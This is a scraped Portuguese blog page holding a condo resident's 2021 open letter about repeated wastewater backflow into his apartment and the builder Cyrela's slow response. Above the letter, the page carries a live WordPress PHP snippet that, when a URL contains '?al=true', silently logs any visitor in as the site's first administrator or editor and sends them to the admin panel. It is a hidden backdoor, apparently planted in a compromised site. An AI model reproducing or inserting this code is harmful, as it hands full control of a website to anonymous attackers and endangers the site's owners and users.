// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); DESABAFO DE UM CONDÔMINO! – Fala Sanches
1236657.1677ed0.a1d49e5be45046c98447636dfa3d9e34
Oferece a você a oportunidade de leitura e reflexão sobre textos repletos de exemplos, experiências e lições que irão transformar a sua vida.

DESABAFO DE UM CONDÔMINO!

Por José Carlos Sanches – Apto 301.

Queridos condôminos da Torre 2 ‐ Varese. Me contive há dias na expectativa de uma solução que anda a passos de tartaruga, se deveras, caminha. Apenas quando ocorre um novo evento e ligamos para a Cyrela, aparece alguém, depois desaparecem.                                                 

Hoje resolvi externar e tornar pública a minha indignação com o problema recorrente que apresento a seguir: *repetidas vezes recebemos água de lavagem com espuma, através da tubulação de águas servidas dos aptos acima do nosso. ”

Cada vez que isso ocorre o piso da cozinha, varanda e por vezes da sala, móveis e eletrodomésticos são atingidos pela água sebosa. Imaginem a cozinha que deveria ser um lugar limpo e higienizado, nestas condições.                                           

Vejo a minha esposa desesperada, ansiosa pela solução, preocupada e às vezes a chorar diante do problema sem solução pela Cyrela. Além disso, tendo que limpar o piso e móveis dia ou noite sempre que se repete o fato.                         

Compartilho o desabafo para juntos sermos mais severos com o encaminhamento de providências junto à referida empresa – sempre que ocorra algo de sua responsabilidade sem o devido compromisso de solução. Afinal quem sofre as consequências somos nós os condôminos.                                         

Antecipo que iremos conforme orientados proceder com os devidos encaminhamentos junto ao MP e outros. Visto que por outros meios não vimos ação na urgência requerida.               

Obrigado pela atenção.                                 

Sem mais,                                                     

José Carlos Castro Sanches                           

São Luís, 21 de maio de 2021.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *